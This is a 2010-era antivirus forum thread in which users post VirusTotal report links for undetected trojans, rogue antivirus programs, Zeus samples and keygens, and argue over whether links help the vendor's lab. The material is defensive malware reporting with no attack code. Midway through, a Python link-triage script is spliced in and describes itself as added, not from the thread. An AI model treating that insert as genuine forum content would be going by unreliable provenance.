http://www.virustotal.com/file-scan/report.html?id=88370b9ff5652ce367526fe51deb0fcc50e2a92acc33ef5ad61e36063ad90fff-1287947082
Actually it's a keylogger creator, so is it (not) malware? :S
Analyze and tell as fast as you can :)
-
fake av: http://www.virustotal.com/file-scan/report.html?id=00f32c25b3f48af91cf2df34c212c55c1ef83f8fef240829ec753e4cdf57ced0-1287948827
trojan: http://www.virustotal.com/file-scan/report.html?id=8a1ca21f565aec540aa0e3bb4fca52fd32792183aeea3aae08a4f582710111e6-1287936518
both were sent to avast!
-
Slapper Trojan found by Avast 5 but not 4.8 ???
http://www.virustotal.com/file-scan/report.html?id=17ec80f41f6d5017046cc89278147efd6673c45346367c6b3307dede4ea3a80a-1288124367
-
Thanks for the reminder :)
-
New malware http://virusscan.jotti.org/en/scanresult/c36f848df0039d1525bfef47154c03a8874eb3ef
Sample:
Please remove the link to the malware. Send the sample as a password-protected zip archive to virus<at>avast.com.
-
I have 4 samples that have not been detected by avast for seven days
>:(
-
bachnguyen09, you can leave the link from jotti :)
-
Worm.Autorun
http://www.virustotal.com/file-scan/report.html?id=e3ae9d1d016589935718092f7df8df3f106dc7aa301340c4b19457c500ba98af-1288472531
-
http://www.virustotal.com/file-scan/report.html?id=a9ab8b6b0b74a9b0075caeeb544136aea9388db2e67f4c64246b590fad7a0a51-1288522576
http://www.virustotal.com/file-scan/report.html?id=8eab24201eeb1396aa717d0bd79d377b8f4c5ef5287b8f62cff2184ae8bd821a-1288522349
http://www.virustotal.com/file-scan/report.html?id=b546ce0a12dfafce59b2b2868248f5b5578235a6e4af52a8dd21fc9757561f33-1288523434
Sent to Avast Lab.
-
Here is a user in the Spanish forum with an undetected sample.
http://forum.avast.com/index.php?topic=65848.msg555827#msg555827
-
Here are some threats that avast did not find
http://www.virustotal.com/file-scan/report.html?id=b1fc3e6a913fa3c30be290f14affb9b2e55195a03a297f9ee519dc46796ccb79-1289284240
http://www.virustotal.com/file-scan/report.html?id=aa3419dadd52d3ee7b46c36dfed7542932ff4a813e16ee60474a17c6b3dc4bc8-1289282129
-
Your 1st is only detected by 2 scanners, one suspicious and the other a variant of, both of which are of a higher potential for FP.
Your 2nd one is missed by every one of 43 scanners and seems like some copycat comments at the bottom of the page.
However, all this is a moot point as links to VT alone are pointless as members of the avast virus labs have said on a number of occasions, they need the samples. So it is more important to submit samples to avast.
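The check above (a link that is months old, or posted twice, tells the lab nothing) can be automated. The following is an added example, not code from the thread or from avast: it parses the old-style VirusTotal permalinks used throughout this thread, whose `id=` value is `<sha256>-<unix scan time>`, deduplicates by hash (keeping the newest rescan), and flags reports older than a chosen threshold. The seven-day threshold and the tab-separated manifest format are this example's own assumptions; the input links are copied from posts in this thread.

```python
"""Triage VirusTotal permalinks posted in a thread before sending them to a virus lab.

Assumed link format (as seen in this thread): ...report.html?id=<sha256>-<unix scan time>.
The timestamp says how fresh the report is; the hash says whether two links are the same file.
"""
import re
from datetime import datetime, timezone

# id=<64 lowercase hex chars>-<9..10 digit unix timestamp of that particular scan>
VT_ID_RE = re.compile(r"id=([0-9a-f]{64})-(\d{9,10})\b")

# Constructed input: links copied from posts in this thread. It contains a July 2010
# report, an exact duplicate, and a rescan of one hash with a newer timestamp.
SAMPLE_LINKS = [
    "http://www.virustotal.com/file-scan/report.html?id=ce48d778550aaa27aec92531870abd30995e5475ad23b4c50e9685c2551bbd8b-1279900191",
    "http://www.virustotal.com/file-scan/report.html?id=f41b88506655174076e2bd781f8285b360ed9d3267b2e81446f9daaebdf53c8f-1289442972",
    "http://www.virustotal.com/file-scan/report.html?id=67ad1c93c546880ba311aad2e5c19eb33a2eeaa2f2b2906836f63b7715500bba-1289363902",
    "http://www.virustotal.com/file-scan/report.html?id=67ad1c93c546880ba311aad2e5c19eb33a2eeaa2f2b2906836f63b7715500bba-1289363902",
    "http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289363574",
    "http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289457804",
    "http://forum.avast.com/index.php?topic=64122.msg546624#msg546624",  # not a VT link, skipped
]


def parse_vt_link(url):
    """Return (sha256, scan_time) for an old-style VT permalink, or None if it is not one."""
    m = VT_ID_RE.search(url)
    if not m:
        return None
    return m.group(1), int(m.group(2))


def triage_links(urls, now, max_age_days=7):
    """Deduplicate by SHA-256 (newest scan wins) and flag reports older than max_age_days.

    `now` is a unix timestamp so the result is reproducible; `max_age_days` is an
    arbitrary freshness threshold chosen for this example.
    """
    newest = {}
    for url in urls:
        parsed = parse_vt_link(url)
        if parsed is None:
            continue
        sha, ts = parsed
        if sha not in newest or ts > newest[sha]:
            newest[sha] = ts
    report = []
    for sha, ts in sorted(newest.items(), key=lambda kv: kv[1]):
        age_days = (now - ts) / 86400.0
        report.append({
            "sha256": sha,
            "scanned": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
            "age_days": round(age_days, 1),
            "stale": age_days > max_age_days,
        })
    return report


def manifest_lines(report):
    """Tab-separated lines (sha256, scan time, age in days, STALE/ok): the metadata a
    lab asks for alongside a batch, in a format this example made up."""
    return ["%s\t%s\t%.1f\t%s" % (e["sha256"], e["scanned"], e["age_days"],
                                  "STALE" if e["stale"] else "ok")
            for e in report]


if __name__ == "__main__":
    import time
    # Against today's clock every 2010 report is stale, which is exactly the point.
    for line in manifest_lines(triage_links(SAMPLE_LINKS, now=int(time.time()))):
        print(line)
```

Run it against a list of links pasted from a thread; anything marked STALE should be rescanned (or, better, the file itself sent to the lab) before being posted, and duplicate hashes collapse to one line.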
-
my bad
-
http://www.virustotal.com/file-scan/report.html?id=67ad1c93c546880ba311aad2e5c19eb33a2eeaa2f2b2906836f63b7715500bba-1289363902
http://www.virustotal.com/file-scan/report.html?id=3e82282ac240eb6a47dfa84d59ff942ce7c2369b5293d76e9fe86aabd264d80f-1289363896
http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289363574
http://www.virustotal.com/file-scan/report.html?id=6fe4f8e00d1d0ca5253fb0ab28a6bc3080b782ecc58b5dea21a1388f08b1723d-1289363907
-
http://www.virustotal.com/file-scan/report.html?id=ce48d778550aaa27aec92531870abd30995e5475ad23b4c50e9685c2551bbd8b-1279900191
http://www.virustotal.com/file-scan/report.html?id=f41b88506655174076e2bd781f8285b360ed9d3267b2e81446f9daaebdf53c8f-1289442972
http://www.virustotal.com/file-scan/report.html?id=2bc9d22343dc407b627ff29801a604fc02d0b9c55647eed04e30d8d67bcb0948-1289443049
http://www.virustotal.com/file-scan/report.html?id=d8742493cee66ed81255dedc0aa99fa6c1e9125c123066e691ae4daea699cdb8-1289106634
-
http://www.virustotal.com/file-scan/report.html?id=4e9a3ad34db9ca541f08faee4bdd73cd2715ae8c88dcbca8f157e2243b5a1074-1289457086
http://www.virustotal.com/file-scan/report.html?id=68aa60a46a2d546b48cc98cb2c898c8765011c9f8e0e12353f724652869d6c37-1289456975
http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289457804
http://www.virustotal.com/file-scan/report.html?id=3f112fdc6ef8190b0bcc6798cc8f1decbfa54d7310ff9308f2cb60db041fb29e-1289458254
http://www.virustotal.com/file-scan/report.html?id=ab8147e4a3605e0051be24bc260425a32c7b6a529024e8f1419ff3b38a8ce4f3-1289458476
-
Are you submitting the samples to avast?
If not, you're losing your time posting the links...
-
@Tech you can continue to submit VT links here.lol
http://forums.comodo.com/av-false-positivenegative-detection-reporting/malware-not-detected-2010-t49281.0.html
-
Are you submitting the samples to avast?
If not, you're losing your time posting the links...
Yes, we want to submit the samples to avast.
-
Hi :)
Possible undetected malware: http://www.virustotal.com/file-scan/report.html?id=34da592c1e1339be43657cb072f767874a8dae598a97a591b88ec3b12ad1c12e-1289509350
http://www.virustotal.com/file-scan/report.html?id=1a096a4bfe803b54268d00f4bbbe88c8d3891a3f17781d164a35b938c1170f50-1289510065 (Avast detected this virus but Avast 4 didn't detect it)
-
@Tech you can continue to submit VT links here.lol
http://forums.comodo.com/av-false-positivenegative-detection-reporting/malware-not-detected-2010-t49281.0.html
And what is the relationship between avast and Comodo in this case?
-
@Tech you can continue to submit VT links here.lol
http://forums.comodo.com/av-false-positivenegative-detection-reporting/malware-not-detected-2010-t49281.0.html
And what is the relationship between avast and Comodo in this case?
Actually, when you submit a malicious file to VT, VT will submit the undetected malware to both Avast and Comodo, so I do not understand why such a thread exists on both the Avast and Comodo forums.
Anyway I will not hijack this thread with a Comodo discussion.
Keep up with your submission guys.
Regards
-
Actually, when you submit a malicious file to VT, VT will submit the undetected malware to both Avast and Comodo, so I do not understand why such a thread exists on both the Avast and Comodo forums.
Exactly, and some of the avast! guys have explained that a couple of times, but this thread refuses to die
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=5fb3a5adaef0738d03433f988bb743f6dbfb97cf46bfad1d34cae4af15895d53-1289547163
Update: Now detected as Win32:Malware-gen
-
When you're facing a sample that avast is not detecting... and you check with VirusTotal and avast still does not detect it... or when you get infected because avast simply failed... well, you think you could have a place to say: Hey, avast detection rate could be better.
-
But it still achieves 'nothing' and as I keep saying if you don't go back and modify your posts when it is added, then it is a totally one sided, unbalanced topic that helps 'no one' other than to allow someone to vent their spleen.
It is a total waste of time, avast will always be trying to improve detections. It is the nature of the beast that AVs will always be playing catchup. This is why the generic, algorithmic, behavioural and heuristic signatures/rules were introduced to help improve over just signature based detection.
-
I agree with David, this topic is useless.
Unless avast opens a topic like MBAM has for posting malware, this kind of topic is useless.
Just something else, about what happens to submitted malware: we never know what happened to the malware we have submitted. Delivered or not? Some of it is being added to the database, but what about those that are not detected? Are they clean or are they just being ignored?
avast! needs more ways of collecting malware; a web interface is essential, something that does not cost avast much because they already have the resources for that (a public FTP folder with enough hosting, bandwidth etc.) and it just needs time and a technical team working on it for a few days. I don't want to post links to other vendors' websites because some people don't like it; otherwise, I could post some examples ;)
-
It is a total waste of time
Don't lose yours then :)
-
This kind of topic is useless.
Sorry Omid, but does this make your suggestion also useless? I don't think so...
avast! needs more ways of collecting malware; a web interface is essential, something that does not cost avast much because they already have the resources for that (a public FTP folder with enough hosting, bandwidth etc.) and it just needs time and a technical team working on it for a few days. I don't want to post links to other vendors' websites because some people don't like it; otherwise, I could post some examples ;)
-
It is a total waste of time
Don't lose yours then :)
No it is a total waste of time posting the VT results as I have stated quite clearly and not as you have taken an extract of my comments and posted it in isolation.
It is a total waste of time, avast will always be trying to improve detections. It is the nature of the beast that AVs will always be playing catchup. This is why the generic, algorithmic, behavioural and heuristic signatures/rules were introduced to help improve over just signature based detection.
I'm not the one wasting time posting VT results.
-
I'm not the one wasting time posting VT results.
Just let the thread there. Don't post. Don't read. Don't waste your time. But don't say a thread that I have opened with the best intention and with 180+ posts is a waste of time. It's a matter of personal respect to the one who opened the thread.
-
The number of posts or who started it or respect for who started it has nothing to do with how useful or useless or a waste of time a topic is. That is down to clear hard facts, simply posting the VT results isn't going to help detections, samples are.
Why, if it isn't a waste of time, have several of the virus lab team said it doesn't help them? So to that end it has to be a waste of time, and as I keep banging on, if you don't bother to update your posts when a missed sample is added then it is totally unbalanced. So those visiting the forum get a totally unbalanced view about avast missing samples when there are no subsequent updates when they are added.
So sorry, if I decline your autonomous command not to read, post or waste my time. That is my right to waste my time as it is yours ;D
No one has said anything about your best intentions, that isn't in doubt, just the fact that it isn't meeting your intention.
As my first thread get hijacked and closed without even warning me :P, I'm starting a new one trying to help avast improving detection if possible.
<snip>
-
Are you submitting the samples to avast?
If not, you're losing your time posting the links...
Sure Tech, Everything I post here is sent to Avast (Along with as many others that aren't detecting them as possible)
-
Rogue A/V Program.
http://www.virustotal.com/file-scan/report.html?id=28ae36996382d05cf5ab0bd5c6763ccef9f4ee50eb62feeb3b4b453eb304218f-1289621871
Now being detected as Win32:Malware-gen
-
trojans
http://www.virustotal.com/file-scan/report.html?id=df80dcf3f0d3ee24a508423e48e8d0bb96e44bb5945957b39953d9ab33c97477-1289674128
http://www.virustotal.com/file-scan/report.html?id=38f243ad6fe99e3dfc0f0c9a17bb069b16024ce3afa1e1e88d6246f17b83fc34-1289691606
http://www.virustotal.com/file-scan/report.html?id=798daa4884f51105d09442e585dffa82a35d8e772ef54884aa9f1270ca59991b-1289693895
http://www.virustotal.com/file-scan/report.html?id=d71c12a31f4c01f4502e4a552a9ba9150633db00653753a9e073bef1c1d7cc38-1289673984
http://www.virustotal.com/file-scan/report.html?id=38f243ad6fe99e3dfc0f0c9a17bb069b16024ce3afa1e1e88d6246f17b83fc34-1289697638
http://www.virustotal.com/file-scan/report.html?id=55a39c0b8a8ca16da175bcb3643845296596668504d9a93c1ad322cf68bbb1f5-1282137832
http://www.virustotal.com/file-scan/report.html?id=7430213bca3d3e0abd5e41fbb2b4c09981b14dbcb266fdccfb7706f92a0b1003-1289697253
bot
http://www.virustotal.com/file-scan/report.html?id=b7689c6c10d9887a0fdff2379fae8acc73403e3a68a4236bbb5112d41994d3d7-1289650783
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=bd3edd73b282c48a040ed0673fdae723b26c518358fa94fc26f7814f79dd5086-1289705161
-
Is it possible that a trojan can be disguised with a screen saver file extension?
http://www.virustotal.com/file-scan/report.html?id=a0aa12cdd31154dec56880f57577c316d154945f74dc4e0cceeaba36e5b7cb4d-1289748843
The file was submitted to avast!
-
Zeus v2 sample
http://www.virustotal.com/file-scan/report.html?id=eb6cd7f47545e9c7e1811b49c1e9f07c012a987147cd82210b0192d05d371419-1289748173
Submitted to avast!
-
http://www.virustotal.com/file-scan/report.html?id=91016ccb7ebc08d77fecea5b305f84eeb0d67d2dc22a2391c3d4fb0ba4a4731d-1289938070
http://www.virustotal.com/file-scan/report.html?id=c0d931378b3746894dfc3efc3900dccb112f065e077c2a5e18c236d6dda345b8-1289937663
http://www.virustotal.com/file-scan/report.html?id=fa99a37e7e76a0853a1f9c0c9ab91eb638c1aaf0641f450d8e00d0bd5b7911b1-1289938624
-
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1290143899
http://www.virustotal.com/file-scan/report.html?id=78373ec7d52d511d6ff3334c9d24f50db16a1a5f7038de00add5f436754fdb8f-1290137657
http://www.virustotal.com/file-scan/report.html?id=27b20bf0d034211adfa1ec9b27e2184ff939c89a0047c903315da5e70f9bcd11-1290114380
http://www.virustotal.com/file-scan/report.html?id=1fec86b0ca32c32b47b6a147d4a88ede46aadd4771a17def67178fedc344e1e0-1290122349
http://www.virustotal.com/file-scan/report.html?id=7e48b9e7f34b42a1cfc4ba6c4f0d51fd8ff11eacb4353563995de1f56c091cd7-1290142292
http://www.virustotal.com/file-scan/report.html?id=7666bdb4ffa6344e8167633852966560501b5cdee7cd254f732a5f956cc30868-1290140660
http://www.virustotal.com/file-scan/report.html?id=f7a82722948184ced6a580bf8df3966201832b9b0a07bdf2e05fec314f3a9172-1290142349
http://www.virustotal.com/file-scan/report.html?id=75e3e48ba79564386b215681f279072f817f421655e9bb76b093d876831cf376-1290142320
http://www.virustotal.com/file-scan/report.html?id=0e1882c26fffb718ebe61379e612597a750562248f4371d963e217abfcde91c6-1290123692
-
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1290235107
http://www.virustotal.com/file-scan/report.html?id=618c8fe42aa8d4ab93e45fbe15556676c8955e532f1327059d3b9b51cb0191b6-1290210980
http://www.virustotal.com/file-scan/report.html?id=48c3e39c6a9f265e50ae4c2f5977e58d0fa71abaaa463b4cb7f31905f3c7d123-1290227360
http://www.virustotal.com/file-scan/report.html?id=9b42b3ff4e302328ff1593c9867941587b110a2e511528adc980807055f6d764-1290237285
-
Fake AV program
http://www.virustotal.com/file-scan/report.html?id=935231acde473f769a003ccafec31823aa333122623ff0965bb473e0d18ed5d4-1290283102
-
http://www.virustotal.com/file-scan/report.html?id=283dd498f973656fd6840a666b0857cf4376ff4e8bdeb0bf69107216555a5a9e-1290274802
http://www.virustotal.com/file-scan/report.html?id=25d13f2dfc380191d488f5218cb16187f9ba0f30136b34c58806223db198d866-1290281390
http://www.virustotal.com/file-scan/report.html?id=9233ec6abbe7c2e885fdd5e6126e8c13d83c3d09710525b225073d8f748d0455-1290281147
http://www.virustotal.com/file-scan/report.html?id=b10d97488bea300be1dfbc5ecd8b349a0daa5a3730daa5a139c2fabfd30cd682-1290287246
http://www.virustotal.com/file-scan/report.html?id=1915f81042991096778b05d89903ac97b8edea768d8bf680db5d93dd3702017b-1290270167
http://www.virustotal.com/file-scan/report.html?id=8e051f3c1a40a2b6bf312a73fee364f8bd13e67b60df518c51eb70ac8e4cfa58-1290286601
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=982590d692dad38821beeac8a67bca0d48588411da840f1e7cdc52551131d90e-1290405306
-
Another Trojan.
http://www.virustotal.com/file-scan/report.html?id=7405481483e0db3a217206d44ab7bed0a67cd612022b48c3e0609e1953f36874-1290486211
-
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=08be62efec518609ffdc23be0a6487a23c7ff2905ce4cce878e039235c1b7fba-1290919831
-
Malware and PUPs not detected by avast (but detected by ESET Online):
Nero Burning Rom installers as Win32/Toolbar.AskSBar application
Format Factory 2.10 as a variant of Win32/Adware.ADON application (file >20 MB).
Keygen (http://www.virustotal.com/file-scan/report.html?id=2988cd576f121a7ec4a6465c0b7c34e54693534fe17fc420c8f82e04d19eba21-1290964254) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=351b67dc73b4b42b90160ed2363d99dc40b39ea07be1788c034767a088ced236-1290964252) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=5dc9c2613e0fcbe975aa8eb644b8c331a29b94221313f175db1e5c29b4065f64-1290964594) submitted from Chest.
Asterisk Password Reveal (PUP?) (http://www.virustotal.com/file-scan/report.html?id=84e280f5ec0c7c5a79b2f885d4a3672dde199a27a22dd6c01e62657fcced2f4c-1290964888) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=20f1df38534b05fb80b6ebbe43ec909aa8b5e4980a0bcdf7a117737d307e4fa5-1290965268) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=913d463352eee7bd9f8c4d2e341aeaf1396d22f2e6b90d47c3b8f110c0efdeb7-1290965252) submitted from Chest.
KillProcess 2.44 (PUP? a variant of Win32/KillProcess.A application?) (http://www.virustotal.com/file-scan/report.html?id=014d58b0ba45495ba72c07f68afb8d74cd7d818e5c740f3b3be97d908166988e-1290965661) submitted from Chest.
Is Unlocker 1.9.0 setup a Win32/Adware.ADON application? (http://www.virustotal.com/file-scan/report.html?id=1ad20b852885783d90567d61089f369c9fdcaaa52116a0377663bac4b1c30572-1290965148).
In my tests, only one false positive of NOD32 (ESET): http://www.virustotal.com/file-scan/report.html?id=d5c67fea9f9d0de88f10a4acb728e6d4f1807f43ecc348cb2523e332bfae61b7-1290965863
At least after 1 hour of work, can I have an answer from the virus analysts to this particular post?
-
Malware and PUPs not detected by avast (but detected by ESET Online):
Nero Burning Rom installers as Win32/Toolbar.AskSBar application
Format Factory 2.10 as a variant of Win32/Adware.ADON application (file >20 MB).
Keygen (http://www.virustotal.com/file-scan/report.html?id=2988cd576f121a7ec4a6465c0b7c34e54693534fe17fc420c8f82e04d19eba21-1290964254) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=351b67dc73b4b42b90160ed2363d99dc40b39ea07be1788c034767a088ced236-1290964252) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=5dc9c2613e0fcbe975aa8eb644b8c331a29b94221313f175db1e5c29b4065f64-1290964594) submitted from Chest.
Asterisk Password Reveal (PUP?) (http://www.virustotal.com/file-scan/report.html?id=84e280f5ec0c7c5a79b2f885d4a3672dde199a27a22dd6c01e62657fcced2f4c-1290964888) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=20f1df38534b05fb80b6ebbe43ec909aa8b5e4980a0bcdf7a117737d307e4fa5-1290965268) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=913d463352eee7bd9f8c4d2e341aeaf1396d22f2e6b90d47c3b8f110c0efdeb7-1290965252) submitted from Chest.
KillProcess 2.44 (PUP? a variant of Win32/KillProcess.A application?) (http://www.virustotal.com/file-scan/report.html?id=014d58b0ba45495ba72c07f68afb8d74cd7d818e5c740f3b3be97d908166988e-1290965661) submitted from Chest.
Is Unlocker 1.9.0 setup a Win32/Adware.ADON application? (http://www.virustotal.com/file-scan/report.html?id=1ad20b852885783d90567d61089f369c9fdcaaa52116a0377663bac4b1c30572-1290965148).
In my tests, only one false positive of NOD32 (ESET): http://www.virustotal.com/file-scan/report.html?id=d5c67fea9f9d0de88f10a4acb728e6d4f1807f43ecc348cb2523e332bfae61b7-1290965863
At least after 1 hour of work, can I have an answer from the virus analysts to this particular post?
Hello,
we will not add detection for keygens.
Milos
-
Hello,
we will not add detection for keygens.
Milos
Are these all keygens...:o
Tech, what's up...???
asyn
-
We will not add detection for keygens.
I suppose that for "keygens" only and not for infected ones (clearly malware). Right?
And second, what about the PUPs? And Unlocker?
-
Keygen ??? ??? ???
But Keygen is a Source of Hacking Software ??? ??? ???
-
But Keygen is a Source of Hacking Software ??? ??? ???
But avast should protect only against infections and malware.
It's not intended to protect the intellectual property of third-party software.
So, if it is an inoffensive keygen (i.e., it only generates keys), it won't be detected.
-
But Keygen is a Source of Hacking Software ??? ??? ???
But avast should protect only against infections and malware.
It's not intended to protect the intellectual property of third-party software.
So, if it is an inoffensive keygen (i.e., it only generates keys), it won't be detected.
Okay, I got your point, Tech. If the third-party software is hacked, then avast is not responsible for cleaning up the mess.
Regards!!!
-
We will not add detection for keygens.
I suppose that for "keygens" only and not for infected ones (clearly malware). Right?
And second, what about the PUPs? And Unlocker?
Yes,
of course ;-), you are right.
Milos
-
Hello,
we will not add detection for keygens.
Milos
way to prevent FPs, glad to hear that!
-
Can I add one here? Or maybe I am late. Is this posted already?
http://www.virustotal.com/file-scan/report.html?id=47b472d6d7183911ccfe1bed790ca6485c051b79d04dc0a7775cee48629af735-1291131404
-
http://www.virustotal.com/file-scan/report.html?id=a41a7d89e54b822697a32dccf144dc19a7d1e9ed38fe33e9b6c1947fddcf4fc1-1291131900
http://www.virustotal.com/file-scan/report.html?id=fd78a957851054d3f71a292e580bfad89242c4952a68becb434b0c7fe789a379-1291131904
http://www.virustotal.com/file-scan/report.html?id=afb07e2bff42438c007aecbb87f54e9ab6c92b36ef46ae0c148fe308aeda9340-1291131931
sent to Avast
-
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291153301
http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455
http://www.virustotal.com/file-scan/report.html?id=a940a97a7d0c1d4e24c1148fdb838764f52f11cbadede7390ae22e59b7642abd-1291163390
http://www.virustotal.com/file-scan/report.html?id=67933b5bbf9b1e6227a412bcbc72c0486ec0a7b821c247061c1f3f90d27e4cd3-1291160460
http://www.virustotal.com/file-scan/report.html?id=0f19cb2288164f8ba18f6d8ce02b4a2fcb2cad926f925df4aec8987d92179331-1291163552
http://www.virustotal.com/file-scan/report.html?id=4dbd709c51a4d8cf2e7c85c0dfba09e3516a3f9eeb1677ec40536be0d98fb7de-1291161048
http://www.virustotal.com/file-scan/report.html?id=a1ed506b1587d39815e0b0e89ffcd6313098ad0d0be2dbf660cc1d3771923819-1291161898
http://www.virustotal.com/file-scan/report.html?id=36720ea39a4620003952ef60ab03b155a3a5e7c5017c38c13db05c9cc01a7a3d-1291162777
-
nsm0220,
1. Why do you think this is infected?
http://www.virustotal.com/file-scan/report.html?id=a1ed506b1587d39815e0b0e89ffcd6313098ad0d0be2dbf660cc1d3771923819-1291161898
http://www.virustotal.com/file-scan/report.html?id=67933b5bbf9b1e6227a412bcbc72c0486ec0a7b821c247061c1f3f90d27e4cd3-1291160460
2. avast won't detect an inoffensive keygen. I'm not sure this is one... Anyway, CIS is free and doesn't need a keygen.
http://www.virustotal.com/file-scan/report.html?id=4dbd709c51a4d8cf2e7c85c0dfba09e3516a3f9eeb1677ec40536be0d98fb7de-1291161048
3. invoice.scr seems really infected. Hope avast improves detection.
http://www.virustotal.com/file-scan/report.html?id=0f19cb2288164f8ba18f6d8ce02b4a2fcb2cad926f925df4aec8987d92179331-1291182068
4. This also seems infected: http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455
5. This IS infected for sure... Please, improve detection avast...
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291183205
-
The 4th one, I need that for the G Data database.
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=b12474f41a651c037e04ccf3c2983136079147ea3ffcfefd278846f430249128-1291277536
-
Another Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=72cfd245f0a985ee259d40bc1636b802f25d9825565da602e4c9b28446bc81d5-1291350316
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=03a4369f802f8e348f22d2c691cf1044172637ff979844d1e0a20844578ae07c-1291352451
-
Trojan.Zbot
http://www.virustotal.com/file-scan/report.html?id=5cc6c20cc70948caf5c35cbf1a0821cbeea95ff0ab1aa757f304e1a5ef31d626-1291355314
-
Another Trojan.
http://www.virustotal.com/file-scan/report.html?id=fe4c2063a87ad4c832412f5a54cd552ed6abf48ab1f3bd739822ce092621708e-1291438301
-
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=77dce6096de5e36fefa70e79a4fa34161649981986952ce08e19a6dc656b8fbd-1291617982
-
nsm0220
4. This also seems infected: http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455
Why is the 4th one not in the database? It's a threat.
-
http://www.virustotal.com/file-scan/report.html?id=e840d30d844bcc3e4b85fb401c1c861b3802b8c6a4f9a97884a3544e6dd7aa78-1291631580
http://www.virustotal.com/file-scan/report.html?id=5f0d0797d16af6c55dee86089754aef182050773ffb5edf0384ee6f1e855b8e4-1291647651
http://www.virustotal.com/file-scan/report.html?id=9e68e7e65330a40472a538e770f2f04faf060caa247e721d25e2041f908fa6d4-1291648478
http://www.virustotal.com/file-scan/report.html?id=feab158a71c75f8a94c3fd7b3920efcc79fb9fceb36f32f363b217bcbebf46c4-1291635911
http://www.virustotal.com/file-scan/report.html?id=f303380429d998863eae9a7aa5f56281aef1b3a3ffb5b7a921ff69c30b587ca5-1290031274
http://www.virustotal.com/file-scan/report.html?id=3b1228297147a679d98d3cc01e0c5deec73cc91707c712f3606183c92ca2a59f-1291648184
http://www.virustotal.com/file-scan/report.html?id=ef825efc34e69d811ce82d9c0b14b58d778dfcf9c7a71090b3d3eed4e70c8e20-1291660222
http://www.virustotal.com/file-scan/report.html?id=22dac5fcfe76ec96cbae4833bb59240926f7e3d83ad98369b658acab57dc5c3c-1290175769
http://www.virustotal.com/file-scan/report.html?id=17e072cca9723a69a7322ee3468226a31eb7ed5a85a6e26ac4ac1cd9659e05d2-1291671429
-
Trojan Banker.
http://www.virustotal.com/file-scan/report.html?id=9e68e7e65330a40472a538e770f2f04faf060caa247e721d25e2041f908fa6d4-1291701406
-
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=75d06934187a954dedda2012e20ec7ea8b8ca8569f3e28b50a9ebd5c2a02f1bd-1291703965
-
http://www.virustotal.com/file-scan/report.html?id=fbe964be1c247deb1ffaae2fc5ceb8f374cd56c5cfe313dd4fd11ca5cdbe9c10-1291687179
http://www.virustotal.com/file-scan/report.html?id=2e9f4f830f6e191475c8c65ee493fd4445f0778d50f21a639000951b915543b9-1291761341
http://www.virustotal.com/file-scan/report.html?id=a502d9397723208b68ec85a026c908a845de8af8b9a59b2fa06d07ef1e73e8e5-1291764175
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291830602
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1291848520
http://www.virustotal.com/file-scan/report.html?id=8863916514f8a6ce1fa856c6c7b8dbfb0c4b1b272aa8faaf404f1265d09b71a8-1291860624
http://www.virustotal.com/file-scan/report.html?id=6de4790bccd91e52b9b37a8e06caf319a031e428348605abccf0b1edc163eff2-1291860389
http://www.virustotal.com/file-scan/report.html?id=ce3c29ec200ee7ada1f7d154e081da8e579396706b1f75084a2cf1679400933d-1291861361
http://www.virustotal.com/file-scan/report.html?id=9a87e02ce03c3b3a63e6ff6eb622e2d946e2e83c94d88e1919a03e85dfd269bb-1291733983
-
Trojan.PWS
http://www.virustotal.com/file-scan/report.html?id=ae5441f9e28cd942edf5676ef8d1785dc608a97db07f36d4510209aacf077554-1291871234
-
http://www.virustotal.com/file-scan/report.html?id=59d42bc32b357261fc3ea47f29f51d9265727c8fd94aa18ae7551fb5e55c15c3-1291782385
http://www.virustotal.com/file-scan/report.html?id=2cc896bed72cff170721a482bcd25947b42f7ec0e8eb26f9ec65d05570637b13-1291366141
